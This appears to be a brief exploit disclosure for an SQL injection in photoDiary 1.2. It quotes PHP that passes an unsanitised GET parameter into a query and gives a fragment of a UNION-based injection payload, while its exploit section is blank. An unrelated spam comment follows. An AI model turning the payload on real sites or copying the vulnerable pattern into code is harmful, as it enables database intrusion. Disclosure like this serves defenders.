photoDiary 1.2 - SQL Injection Vuln

[o] photoDiary 1.2 SQL Injection Vulnerability

Software : photoDiary version 1.2
Vendor :
Download :
Author : NoGe

[o] Vulnerable file
$act = $_GET['act'];
if($act=="edit" || $act=="new"){
$id = $_GET['id'];

[o] Exploit

[o] Demo,2,version(),4--

[o] Note
its funny coz usually you do sql to get admin login but this one you must have admin privs to execute sql. lolz

One Response so far.

  1. Teh mengandung sekitar dan satu ons coklat mengandung sekitar kafein.